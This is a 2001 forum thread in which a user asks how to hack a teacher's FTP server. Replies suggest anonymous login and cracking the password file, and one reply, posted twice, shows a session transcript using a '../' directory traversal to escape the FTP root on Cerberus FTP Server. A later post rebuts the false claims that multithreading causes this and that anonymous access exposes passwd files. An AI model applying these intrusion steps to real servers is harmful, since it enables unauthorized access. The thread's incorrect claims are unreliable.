-
September 18th, 2001, 04:34 PM
#1
Member
ftp server
is it possible to hack into a ftp server??
I want to hack a site from my teacher, but the only way I can think off is a program that tries out alot off words (with a dictionary)
This will not work, but does anyone know a better way?
greetz T
GOD invented evolution \'cause he couldn\'t do it all by himself.
-
September 19th, 2001, 08:46 PM
#2
And why do you wanna hack the FTP server?
Check for user:Anonymous Pass:Anonymous
And if you can get on, download the password file
Then decrypt it
-
September 20th, 2001, 12:41 AM
#3
Junior Member
Most FTP Servers are multithreaded supporting the RFC 959 protocol completely. A security vulnerability in these products allows attackers to traverse outside the normal bounding FTP root directory and read arbitrary files on the system.
Example:
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Benutzer (192.168.0.2none)): anonymous
230 User anonymous logged in
ftp> ls
200 Port command received
150 Opening data connection
delphiown
226 Transfer complete
FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
ftp> cd delphiown/../../
250 Change directory ok
ftp> ls
200 Port command received
150 Opening data connection
As you can see, you need at least one valid directory, to break out of the ftp root-dir.
chris@zxtech.net
www.zxtech.net
ZXtech Unix Hosting
-
September 20th, 2001, 12:41 AM
#4
Junior Member
Most FTP Servers are multithreaded supporting the RFC 959 protocol completely. A security vulnerability in these products allows attackers to traverse outside the normal bounding FTP root directory and read arbitrary files on the system.
Example:
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Benutzer (192.168.0.2none)): anonymous
230 User anonymous logged in
ftp> ls
200 Port command received
150 Opening data connection
delphiown
226 Transfer complete
FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
ftp> cd delphiown/../../
250 Change directory ok
ftp> ls
200 Port command received
150 Opening data connection
As you can see, you need at least one valid directory, to break out of the ftp root-dir.
chris@zxtech.net
www.zxtech.net
ZXtech Unix Hosting
-
September 20th, 2001, 08:54 AM
#5
Member
First off.. limp.. What the hell are you talking about? Anonymous access, at least on a UNIX machine will NOT devulge a passwd file. ftproot is setup to have it's own directory structure so that anonymous users cannot traverse outside of the daemon's root unless a user is logged in witha valid username and password.
..next..
What do you mean since it's multithreaded that you can leave document root? Hello. That's lame. Just because it's multi threaded doesn't meant that it can leave root. Multithreaded means that it can handle more than one connection (or process) at the same time. This has nothing to do witha poorly written FTP server not doign bounds checking on an anonymous connection to see if it is leaving root.
And, if a vlid username and password is given, it is SUPPOSED to leave ftp root, as a matter of fact, it's supposed to dump you in your home directory. As least on most UNIX setups.
Jason Parker - http://www.o-negative.net
o-Negative: Information Network
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|